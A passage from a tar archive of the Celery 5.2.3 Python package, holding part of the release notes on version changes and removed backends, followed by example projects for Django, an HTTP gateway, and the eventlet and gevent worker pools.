minimum required version is Kombu 5.2.0. Prefork Workers Pool --------------------- Now all orphaned worker processes are killed automatically when main process exits. Eventlet Workers Pool --------------------- You can now terminate running revoked tasks while using the Eventlet Workers Pool. Custom Task Classes ------------------- We introduced a custom handler which will be executed before the task is started called ``before_start``. See :ref:`custom-task-cls-app-wide` for more details. Important Notes From 5.0 ------------------------ Dropped support for Python 2.7 & 3.5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Celery now requires Python 3.6 and above. Python 2.7 has reached EOL in January 2020. In order to focus our efforts we have dropped support for Python 2.7 in this version. In addition, Python 3.5 has reached EOL in September 2020. Therefore, we are also dropping support for Python 3.5. If you still require to run Celery using Python 2.7 or Python 3.5 you can still use Celery 4.x. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 2.7 or Python 3.5. Eventlet Workers Pool ~~~~~~~~~~~~~~~~~~~~~ Due to `eventlet/eventlet#526 `_ the minimum required version is eventlet 0.26.1. Gevent Workers Pool ~~~~~~~~~~~~~~~~~~~ Starting from v5.0, the minimum required version is gevent 1.0.0. Couchbase Result Backend ~~~~~~~~~~~~~~~~~~~~~~~~ The Couchbase result backend now uses the V3 Couchbase SDK. As a result, we no longer support Couchbase Server 5.x. Also, starting from v5.0, the minimum required version for the database client is couchbase 3.0.0. To verify that your Couchbase Server is compatible with the V3 SDK, please refer to their `documentation `_. Riak Result Backend ~~~~~~~~~~~~~~~~~~~ The Riak result backend has been removed as the database is no longer maintained. The Python client only supports Python 3.6 and below which prevents us from supporting it and it is also unmaintained. If you are still using Riak, refrain from upgrading to Celery 5.0 while you migrate your application to a different database. We apologize for the lack of notice in advance but we feel that the chance you'll be affected by this breaking change is minimal which is why we did it. AMQP Result Backend ~~~~~~~~~~~~~~~~~~~ The AMQP result backend has been removed as it was deprecated in version 4.0. Removed Deprecated Modules ~~~~~~~~~~~~~~~~~~~~~~~~~~ The `celery.utils.encoding` and the `celery.task` modules has been deprecated in version 4.0 and therefore are removed in 5.0. If you were using the `celery.utils.encoding` module before, you should import `kombu.utils.encoding` instead. If you were using the `celery.task` module before, you should import directly from the `celery` module instead. `azure-servicebus` 7.0.0 is now required ---------------------------------------- Given the SDK changes between 0.50.0 and 7.0.0 Kombu deprecates support for older `azure-servicebus` versions. .. _v520-news: Bug: Pymongo 3.12.1 is not compatible with Celery 5.2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For now we are limiting Pymongo version, only allowing for versions between 3.3.0 and 3.12.0. This will be fixed in the next patch. News ==== Support for invoking chords of unregistered tasks ------------------------------------------------- Previously if you attempted to publish a chord while providing a signature which wasn't registered in the Celery app publishing the chord as the body of the chord, an :exc:`celery.exceptions.NotRegistered` exception would be raised. From now on, you can publish these sort of chords and they would be executed correctly: .. code-block:: python # movies.task.publish_movie is registered in the current app movie_task = celery_app.signature('movies.task.publish_movie', task_id=str(uuid.uuid4()), immutable=True) # news.task.publish_news is *not* registered in the current app news_task = celery_app.signature('news.task.publish_news', task_id=str(uuid.uuid4()), immutable=True) my_chord = chain(movie_task, group(movie_task.set(task_id=str(uuid.uuid4())), movie_task.set(task_id=str(uuid.uuid4()))), news_task) my_chord.apply_async() # <-- No longer raises an exception Consul Result Backend --------------------- We now create a new client per request to Consul to avoid a bug in the Consul client. The Consul Result Backend now accepts a new :setting:`result_backend_transport_options` key: ``one_client``. You can opt out of this behavior by setting ``one_client`` to True. Please refer to the documentation of the backend if you're using the Consul backend to find out which behavior suites you. Filesystem Result Backend ------------------------- We now cleanup expired task results while using the filesystem result backend as most result backends do. ArangoDB Result Backend ----------------------- You can now check the validity of the CA certificate while making a TLS connection to ArangoDB result backend. If you'd like to do so, set the ``verify`` key in the :setting:`arangodb_backend_settings`` dictionary to ``True``. ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.703755 celery-5.2.3/examples/0000775000175000017500000000000000000000000014513 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/README.rst0000664000175000017500000000045700000000000016210 0ustar00asifasif00000000000000================= Celery Examples ================= * pythonproject Example Python project using celery. * httpexample Example project using remote tasks (webhook tasks) * celery_http_gateway Example HTTP service exposing the ability to apply tasks and query the resulting status/return value. ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.703755 celery-5.2.3/examples/app/0000775000175000017500000000000000000000000015273 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/app/myapp.py0000664000175000017500000000137100000000000016775 0ustar00asifasif00000000000000"""myapp.py Usage:: (window1)$ python myapp.py worker -l INFO (window2)$ python >>> from myapp import add >>> add.delay(16, 16).get() 32 You can also specify the app to use with the `celery` command, using the `-A` / `--app` option:: $ celery -A myapp worker -l INFO With the `-A myproj` argument the program will search for an app instance in the module ``myproj``. You can also specify an explicit name using the fully qualified form:: $ celery -A myapp:app worker -l INFO """ from celery import Celery app = Celery( 'myapp', broker='amqp://guest@localhost//', # ## add result backend here if needed. # backend='rpc' ) @app.task def add(x, y): return x + y if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.707755 celery-5.2.3/examples/celery_http_gateway/0000775000175000017500000000000000000000000020556 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/README.rst0000664000175000017500000000254600000000000022254 0ustar00asifasif00000000000000============================== Example Celery->HTTP Gateway ============================== This is an example service exposing the ability to apply tasks and query statuses/results over HTTP. Some familiarity with Django is recommended. `settings.py` contains the celery settings, you probably want to configure at least the broker related settings. To run the service you have to run the following commands:: $ python manage.py syncdb # (if running the database backend) $ python manage.py runserver The service is now running at http://localhost:8000 You can apply tasks, with the `/apply/` URL:: $ curl http://localhost:8000/apply/celery.ping/ {"ok": "true", "task_id": "e3a95109-afcd-4e54-a341-16c18fddf64b"} Then you can use the resulting task-id to get the return value:: $ curl http://localhost:8000/e3a95109-afcd-4e54-a341-16c18fddf64b/status/ {"task": {"status": "SUCCESS", "result": "pong", "id": "e3a95109-afcd-4e54-a341-16c18fddf64b"}} If you don't want to expose all tasks there're a few possible approaches. For instance you can extend the `apply` view to only accept a white-list. Another possibility is to just make views for every task you want to expose. We made on such view for ping in `views.ping`:: $ curl http://localhost:8000/ping/ {"ok": "true", "task_id": "383c902c-ba07-436b-b0f3-ea09cc22107c"} ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/__init__.py0000664000175000017500000000000000000000000022655 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/manage.py0000664000175000017500000000060100000000000022355 0ustar00asifasif00000000000000#!/usr/bin/env python from django.core.management import execute_manager try: import settings # Assumed to be in the same directory. except ImportError: import sys sys.stderr.write( "Error: Can't find the file 'settings.py' in the directory " "containing {!r}.".format(__file__)) sys.exit(1) if __name__ == '__main__': execute_manager(settings) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/examples/celery_http_gateway/settings.py0000664000175000017500000000567100000000000023001 0ustar00asifasif00000000000000import django # Django settings for celery_http_gateway project. DEBUG = True TEMPLATE_DEBUG = DEBUG CELERY_RESULT_BACKEND = 'database' BROKER_URL = 'amqp://guest:guest@localhost:5672//' ADMINS = ( # ('Your Name', 'your_email@domain.com'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': 'development.db', 'USER': '', 'PASSWORD': '', 'HOST': '', 'PORT': '', } } if django.VERSION[:3] < (1, 3): DATABASE_ENGINE = DATABASES['default']['ENGINE'] DATABASE_NAME = DATABASES['default']['NAME'] DATABASE_USER = DATABASES['default']['USER'] DATABASE_PASSWORD = DATABASES['default']['PASSWORD'] DATABASE_HOST = DATABASES['default']['HOST'] DATABASE_PORT = DATABASES['default']['PORT'] # Local time zone for this installation. Choices can be found here: # https://en.wikipedia.org/wiki/List_of_tz_zones_by_name # although not all choices may be available on all operating systems. # If running in a Windows environment this must be set to the same as your # system time zone. TIME_ZONE = 'America/Chicago' # Language code for this installation. All choices can be found here: # http://www.i18nguy.com/unicode/language-identifiers.html LANGUAGE_CODE = 'en-us' SITE_ID = 1 # If you set this to False, Django will make some optimizations so as not # to load the internationalization machinery. USE_I18N = True # Absolute path to the directory that holds media. # Example: '/home/media/media.lawrence.com/' MEDIA_ROOT = '' # URL that handles the media served from MEDIA_ROOT. Make sure to use a # trailing slash if there's a path component (optional in other cases). # Examples: 'http://media.lawrence.com', 'http://example.com/media/' MEDIA_URL = '' # URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a # trailing slash. # Examples: 'http://foo.com/media/', '/media/'. ADMIN_MEDIA_PREFIX = '/media/' # Make this unique, and don't share it with anybody. # XXX TODO FIXME Set this secret key to anything you want, just change it! SECRET_KEY = 'This is not a secret, be sure to change this.' # List of callables that know how to import templates from various sources. TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.load_template_source', 'django.template.loaders.app_directories.load_template_source', ) MIDDLEWARE = [ 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', ] ROOT_URLCONF = 'celery_http_gateway.urls' TEMPLATE_DIRS = ( # Put strings here, like '/home/html/django_templates' or # 'C:/www/django/templates'. # Always use forward slashes, even on Windows. # Don't forget to use absolute paths, not relative paths. ) INSTALLED_APPS = ( 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'djcelery', ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/tasks.py0000664000175000017500000000013000000000000022247 0ustar00asifasif00000000000000from celery import task @task() def hello_world(to='world'): return f'Hello {to}' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/celery_http_gateway/urls.py0000664000175000017500000000131700000000000022117 0ustar00asifasif00000000000000from celery_http_gateway.tasks import hello_world from django.conf.urls.defaults import (handler404, handler500, # noqa include, patterns, url) from djcelery import views as celery_views # Uncomment the next two lines to enable the admin: # from django.contrib import admin # admin.autodiscover() urlpatterns = patterns( '', url(r'^apply/(?P.+?)/', celery_views.apply), url(r'^hello/', celery_views.task_view(hello_world)), url(r'^(?P[\w\d\-]+)/done/?$', celery_views.is_task_successful, name='celery-is_task_successful'), url(r'^(?P[\w\d\-]+)/status/?$', celery_views.task_status, name='celery-task_status'), ) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.707755 celery-5.2.3/examples/django/0000775000175000017500000000000000000000000015755 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/README.rst0000664000175000017500000000301700000000000017445 0ustar00asifasif00000000000000============================================================== Example Django project using Celery ============================================================== Contents ======== ``proj/`` --------- This is a project in itself, created using ``django-admin.py startproject proj``, and then the settings module (``proj/settings.py``) was modified to add ``demoapp`` to ``INSTALLED_APPS`` ``proj/celery.py`` ---------- This module contains the Celery application instance for this project, we take configuration from Django settings and use ``autodiscover_tasks`` to find task modules inside all packages listed in ``INSTALLED_APPS``. ``demoapp/`` ------------ Example generic app. This is decoupled from the rest of the project by using the ``@shared_task`` decorator. This decorator returns a proxy that always points to the currently active Celery instance. Installing requirements ======================= The settings file assumes that ``rabbitmq-server`` is running on ``localhost`` using the default ports. More information here: http://docs.celeryproject.org/en/latest/getting-started/brokers/rabbitmq.html In addition, some Python requirements must also be satisfied: .. code-block:: console $ pip install -r requirements.txt Starting the worker =================== .. code-block:: console $ celery -A proj worker -l INFO Running a task =================== .. code-block:: console $ python ./manage.py shell >>> from demoapp.tasks import add, mul, xsum >>> res = add.delay(2,3) >>> res.get() 5 ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.711755 celery-5.2.3/examples/django/demoapp/0000775000175000017500000000000000000000000017402 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/__init__.py0000664000175000017500000000000000000000000021501 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.711755 celery-5.2.3/examples/django/demoapp/migrations/0000775000175000017500000000000000000000000021556 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/migrations/0001_initial.py0000664000175000017500000000074600000000000024230 0ustar00asifasif00000000000000# Generated by Django 2.2.1 on 2019-05-24 21:37 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Widget', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=140)), ], ), ] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/migrations/__init__.py0000664000175000017500000000000000000000000023655 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/models.py0000664000175000017500000000014700000000000021241 0ustar00asifasif00000000000000from django.db import models class Widget(models.Model): name = models.CharField(max_length=140) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/tasks.py0000664000175000017500000000066500000000000021110 0ustar00asifasif00000000000000# Create your tasks here from demoapp.models import Widget from celery import shared_task @shared_task def add(x, y): return x + y @shared_task def mul(x, y): return x * y @shared_task def xsum(numbers): return sum(numbers) @shared_task def count_widgets(): return Widget.objects.count() @shared_task def rename_widget(widget_id, name): w = Widget.objects.get(id=widget_id) w.name = name w.save() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/demoapp/views.py0000664000175000017500000000003200000000000021104 0ustar00asifasif00000000000000# Create your views here. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/manage.py0000775000175000017500000000037000000000000017562 0ustar00asifasif00000000000000#!/usr/bin/env python import os import sys if __name__ == '__main__': os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') from django.core.management import execute_from_command_line execute_from_command_line(sys.argv) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7157552 celery-5.2.3/examples/django/proj/0000775000175000017500000000000000000000000016727 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/__init__.py0000664000175000017500000000025600000000000021043 0ustar00asifasif00000000000000# This will make sure the app is always imported when # Django starts so that shared_task will use this app. from .celery import app as celery_app __all__ = ('celery_app',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/celery.py0000664000175000017500000000117700000000000020572 0ustar00asifasif00000000000000import os from celery import Celery # Set the default Django settings module for the 'celery' program. os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') app = Celery('proj') # Using a string here means the worker doesn't have to serialize # the configuration object to child processes. # - namespace='CELERY' means all celery-related configuration keys # should have a `CELERY_` prefix. app.config_from_object('django.conf:settings', namespace='CELERY') # Load task modules from all registered Django apps. app.autodiscover_tasks() @app.task(bind=True) def debug_task(self): print(f'Request: {self.request!r}') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/settings.py0000664000175000017500000000706700000000000021153 0ustar00asifasif00000000000000import os # ^^^ The above is required if you want to import from the celery # library. If you don't have this then `from celery.schedules import` # becomes `proj.celery.schedules` in Python 2.x since it allows # for relative imports by default. # Celery settings CELERY_BROKER_URL = 'amqp://guest:guest@localhost' #: Only add pickle to this list if your broker is secured #: from unwanted access (see userguide/security.html) CELERY_ACCEPT_CONTENT = ['json'] CELERY_RESULT_BACKEND = 'db+sqlite:///results.sqlite' CELERY_TASK_SERIALIZER = 'json' """ Django settings for proj project. Generated by 'django-admin startproject' using Django 2.2.1. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'l!t+dmzf97rt9s*yrsux1py_1@odvz1szr&6&m!f@-nxq6k%%p' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'demoapp', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'proj.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'proj.wsgi.application' # Database # https://docs.djangoproject.com/en/2.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.2/howto/static-files/ STATIC_URL = '/static/' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/urls.py0000664000175000017500000000105400000000000020266 0ustar00asifasif00000000000000from django.urls import handler404, handler500, include, url # noqa # Uncomment the next two lines to enable the admin: # from django.contrib import admin # admin.autodiscover() urlpatterns = [ # Examples: # url(r'^$', 'proj.views.home', name='home'), # url(r'^proj/', include('proj.foo.urls')), # Uncomment the admin/doc line below to enable admin documentation: # url(r'^admin/doc/', include('django.contrib.admindocs.urls')), # Uncomment the next line to enable the admin: # url(r'^admin/', include(admin.site.urls)), ] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/proj/wsgi.py0000664000175000017500000000215400000000000020254 0ustar00asifasif00000000000000""" WSGI config for proj project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense to replace the whole Django WSGI application with a custom one that later delegates to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') application = get_wsgi_application() # Apply WSGI middleware here. # from helloworld.wsgi import HelloWorldApplication # application = HelloWorldApplication(application) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/django/requirements.txt0000664000175000017500000000005700000000000021243 0ustar00asifasif00000000000000django>=2.2.1 sqlalchemy>=1.0.14 celery>=5.0.5 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7197552 celery-5.2.3/examples/eventlet/0000775000175000017500000000000000000000000016341 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/README.rst0000664000175000017500000000270100000000000020030 0ustar00asifasif00000000000000================================== Example using the Eventlet Pool ================================== Introduction ============ This is a Celery application containing two example tasks. First you need to install Eventlet, and also recommended is the `dnspython` module (when this is installed all name lookups will be asynchronous):: $ pip install eventlet $ pip install dnspython $ pip install requests Before you run any of the example tasks you need to start the worker:: $ cd examples/eventlet $ celery worker -l INFO --concurrency=500 --pool=eventlet As usual you need to have RabbitMQ running, see the Celery getting started guide if you haven't installed it yet. Tasks ===== * `tasks.urlopen` This task simply makes a request opening the URL and returns the size of the response body:: $ cd examples/eventlet $ python >>> from tasks import urlopen >>> urlopen.delay('http://www.google.com/').get() 9980 To open several URLs at once you can do:: $ cd examples/eventlet $ python >>> from tasks import urlopen >>> from celery import group >>> result = group(urlopen.s(url) ... for url in LIST_OF_URLS).apply_async() >>> for incoming_result in result.iter_native(): ... print(incoming_result) * `webcrawler.crawl` This is a simple recursive web crawler. It will only crawl URLs for the current host name. Please see comments in the `webcrawler.py` file. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/bulk_task_producer.py0000664000175000017500000000321100000000000022572 0ustar00asifasif00000000000000from eventlet import Timeout, monkey_patch, spawn_n from eventlet.event import Event from eventlet.queue import LightQueue monkey_patch() class Receipt: result = None def __init__(self, callback=None): self.callback = callback self.ready = Event() def finished(self, result): self.result = result if self.callback: self.callback(result) self.ready.send() def wait(self, timeout=None): with Timeout(timeout): return self.ready.wait() class ProducerPool: """Usage:: >>> app = Celery(broker='amqp://') >>> ProducerPool(app) """ Receipt = Receipt def __init__(self, app, size=20): self.app = app self.size = size self.inqueue = LightQueue() self._running = None self._producers = None def apply_async(self, task, args, kwargs, callback=None, **options): if self._running is None: self._running = spawn_n(self._run) receipt = self.Receipt(callback) self.inqueue.put((task, args, kwargs, options, receipt)) return receipt def _run(self): self._producers = [ spawn_n(self._producer) for _ in range(self.size) ] def _producer(self): inqueue = self.inqueue with self.app.producer_or_acquire() as producer: while 1: task, args, kwargs, options, receipt = inqueue.get() result = task.apply_async(args, kwargs, producer=producer, **options) receipt.finished(result) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/celeryconfig.py0000664000175000017500000000052000000000000021361 0ustar00asifasif00000000000000import os import sys sys.path.insert(0, os.getcwd()) # ## Start worker with -P eventlet # Never use the worker_pool setting as that'll patch # the worker too late. broker_url = 'amqp://guest:guest@localhost:5672//' worker_disable_rate_limits = True result_backend = 'amqp' result_expires = 30 * 60 imports = ('tasks', 'webcrawler') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/tasks.py0000664000175000017500000000042500000000000020041 0ustar00asifasif00000000000000import requests from celery import task @task() def urlopen(url): print(f'-open: {url}') try: response = requests.get(url) except requests.exceptions.RequestException as exc: print(f'-url {url} gave error: {exc!r}') return len(response.text) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/eventlet/webcrawler.py0000664000175000017500000000370600000000000021056 0ustar00asifasif00000000000000"""Recursive webcrawler example. For asynchronous DNS lookups install the `dnspython` package: $ pip install dnspython Requires the `pybloom` module for the bloom filter which is used to ensure a lower chance of recrawling a URL previously seen. Since the bloom filter is not shared, but only passed as an argument to each subtask, it would be much better to have this as a centralized service. Redis sets could also be a practical solution. A BloomFilter with a capacity of 100_000 members and an error rate of 0.001 is 2.8MB pickled, but if compressed with zlib it only takes up 2.9kB(!). We don't have to do compression manually, just set the tasks compression to "zlib", and the serializer to "pickle". """ import re import requests from eventlet import Timeout from pybloom import BloomFilter from celery import group, task try: from urllib.parse import urlsplit except ImportError: from urlparse import urlsplit # http://daringfireball.net/2009/11/liberal_regex_for_matching_urls url_regex = re.compile( r'\b(([\w-]+://?|www[.])[^\s()<>]+(?:\([\w\d]+\)|([^[:punct:]\s]|/)))') def domain(url): """Return the domain part of a URL.""" return urlsplit(url)[1].split(':')[0] @task(ignore_result=True, serializer='pickle', compression='zlib') def crawl(url, seen=None): print(f'crawling: {url}') if not seen: seen = BloomFilter(capacity=50000, error_rate=0.0001) with Timeout(5, False): try: response = requests.get(url) except requests.exception.RequestError: return location = domain(url) wanted_urls = [] for url_match in url_regex.finditer(response.text): url = url_match.group(0) # To not destroy the internet, we only fetch URLs on the same domain. if url not in seen and location in domain(url): wanted_urls.append(url) seen.add(url) subtasks = group(crawl.s(url, seen) for url in wanted_urls) subtasks.delay() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/gevent/0000775000175000017500000000000000000000000016003 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/gevent/celeryconfig.py0000664000175000017500000000037700000000000021035 0ustar00asifasif00000000000000import os import sys sys.path.insert(0, os.getcwd()) # ## Note: Start worker with -P gevent, # do not use the worker_pool option. broker_url = 'amqp://guest:guest@localhost:5672//' result_backend = 'amqp' result_expires = 30 * 60 imports = ('tasks',) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/gevent/tasks.py0000664000175000017500000000050500000000000017502 0ustar00asifasif00000000000000import requests from celery import task @task(ignore_result=True) def urlopen(url): print(f'Opening: {url}') try: requests.get(url) except requests.exceptions.RequestException as exc: print(f'Exception for {url}: {exc!r}') return url, 0 print(f'Done with: {url}') return url, 1 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/next-steps/0000775000175000017500000000000000000000000016625 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/next-steps/proj/0000775000175000017500000000000000000000000017577 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/proj/__init__.py0000664000175000017500000000000000000000000021676 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/proj/celery.py0000664000175000017500000000044600000000000021440 0ustar00asifasif00000000000000from celery import Celery app = Celery('proj', broker='amqp://', backend='rpc://', include=['proj.tasks']) # Optional configuration, see the application user guide. app.conf.update( result_expires=3600, ) if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/proj/tasks.py0000664000175000017500000000024700000000000021301 0ustar00asifasif00000000000000from .celery import app @app.task def add(x, y): return x + y @app.task def mul(x, y): return x * y @app.task def xsum(numbers): return sum(numbers) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/next-steps/setup.py0000664000175000017500000000231000000000000020333 0ustar00asifasif00000000000000""" Example setup file for a project using Celery. This can be used to distribute your tasks and worker as a Python package, on PyPI or on your own private package index. """ from setuptools import find_packages, setup setup( name='example-tasks', url='http://github.com/example/celery-tasks', author='Ola A. Normann', author_email='author@example.com', keywords='our celery integration', version='2.0', description='Tasks for my project', long_description=__doc__, license='BSD', packages=find_packages(exclude=['ez_setup', 'tests', 'tests.*']), test_suite='pytest', zip_safe=False, install_requires=[ 'celery>=5.0', # 'requests', ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'License :: OSI Approved :: BSD License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy3', 'Operating System :: OS Independent', ], ) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7237554 celery-5.2.3/examples/periodic-tasks/0000775000175000017500000000000000000000000017434 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 